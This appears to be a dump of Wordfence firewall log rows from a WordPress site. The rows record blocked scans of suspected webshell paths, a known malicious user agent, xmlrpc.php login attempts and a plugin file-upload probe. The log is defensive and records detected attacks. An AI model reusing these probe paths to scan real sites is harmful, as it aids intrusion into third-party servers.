(50393, 1711218454.864002, 1711218454.445400, '\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 0, 403, 0, 0, 0, 'https://happythinking.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(50403, 1711250187.799865, 1711250187.507600, '\0\0\0\0\0\0\0\0\0\0ÿÿ²Ÿ%&', 0, 403, 0, 0, 0, 'https://happythinking.com/', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(50394, 1711218408.094990, 1711218407.742100, '\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 0, 403, 0, 0, 0, 'https://happythinking.com/chosen.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nob3Nlbi5waHA=","category":"brute-force","ssl":1}'),
(50401, 1711237012.748220, 1711237012.432500, '\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/chosen.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nob3Nlbi5waHA=","category":"brute-force","ssl":1}'),
(50405, 0.000000, 1711256225.857338, '\0\0\0\0\0\0\0\0\0\0ÿÿ"W;Ö', 0, 503, 0, 0, 0, 'https://happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50406, 1711259737.604879, 1711259737.291900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50402, 1711237003.278513, 1711237002.816100, '\0\0\0\0\0\0\0\0\0\0ÿÿ­Ôío', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50408, 1711259716.443703, 1711259716.104400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://happythinking.com/chosen.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nob3Nlbi5waHA=","category":"brute-force","ssl":1}'),
(50404, 1711250186.742938, 1711250186.363800, '\0\0\0\0\0\0\0\0\0\0ÿÿ²Ÿ%&', 0, 403, 0, 0, 0, 'https://happythinking.com/', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(50426, 1711358549.965385, 1711358549.618500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/upfile.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZmlsZS5waHA=","category":"brute-force","ssl":1}'),
(50407, 1711259730.361584, 1711259729.998200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://happythinking.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(50418, 0.000000, 1711266093.018334, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;aj', 0, 200, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50419, 0.000000, 1711269318.652179, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50420, 1711347010.204495, 1711347009.826700, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œDU', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(50421, 1711354292.289508, 1711354291.883900, '\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50422, 1711354287.782866, 1711354287.392900, '\0\0\0\0\0\0\0\0\0\0ÿÿ§Vnd', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50372, 0.000000, 1711146892.325231, '\0\0\0\0\0\0\0\0\0\0ÿÿNŸcÍ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50310, 1711080862.967133, 1711080862.554500, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/blog.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jsb2cucGhw","category":"brute-force","ssl":1}'),
(50311, 1711080859.790232, 1711080859.449200, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/moon.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21vb24ucGhw","category":"brute-force","ssl":1}'),
(50373, 0.000000, 1711146897.449578, '\0\0\0\0\0\0\0\0\0\0ÿÿg-Bä', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50374, 0.000000, 1711146899.215923, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\ÌßÍ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50369, 1711139903.174222, 1711139902.073200, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50312, 1711080856.447809, 1711080856.139200, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/ae.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FlLnBocA==","category":"brute-force","ssl":1}'),
(50355, 0.000000, 1711120890.398913, '\0\0\0\0\0\0\0\0\0\0ÿÿ#Ö¾Ô', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50356, 0.000000, 1711120890.395598, '\0\0\0\0\0\0\0\0\0\0ÿÿÃÉÉ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50313, 1711080852.304318, 1711080852.001600, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/xmrlpc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(50357, 0.000000, 1711120893.446125, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ¼Ú', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Linux; Android 10; LM-X420) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50314, 1711080849.014398, 1711080848.628300, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/plugins.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMucGhw","category":"brute-force","ssl":1}'),
(50358, 0.000000, 1711120905.146800, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼á(Œ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50315, 1711080845.999332, 1711080845.700200, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/radio.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JhZGlvLnBocA==","category":"brute-force","ssl":1}'),
(51748, 1712368257.589351, 1712368257.219000, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wpstorecart/readme.txt', NULL, 'Mozilla/5.0 (iPod touch; CPU iPhone 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 YaBrowser/24.1.1.655 Mobile/15E148 Safari/605.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHN0b3JlY2FydC9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHN0b3JlY2FydC9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51727, 1712368239.503304, 1712368239.167100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/omni-secure-files/plupload/examples/upload.php', NULL, 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.3', 'blocked:waf', 'N-Media Post Front-end Form < 1.1 - Arbitrary File Upload', '{"learningMode":0,"failedRules":"69","paramKey":"c2VydmVyLmVtcHR5","paramValue":"bnVsbA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9vbW5pLXNlY3VyZS1maWxlcy9wbHVwbG9hZC9leGFtcGxlcy91cGxvYWQucGhw","category":"file_upload","ssl":1}'),
(51761, 1712371704.559248, 1712371704.242800, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/cong.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmcucGhw","category":"brute-force","ssl":1}'),
(51783, 1712381058.240149, 1712381057.835400, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(52066, 0.000000, 1712770132.737384, '\0\0\0\0\0\0\0\0\0\0ÿÿÆ]¹', 0, 503, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50822, 1712000395.467319, 1712000394.940900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp-login.php?action=register', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
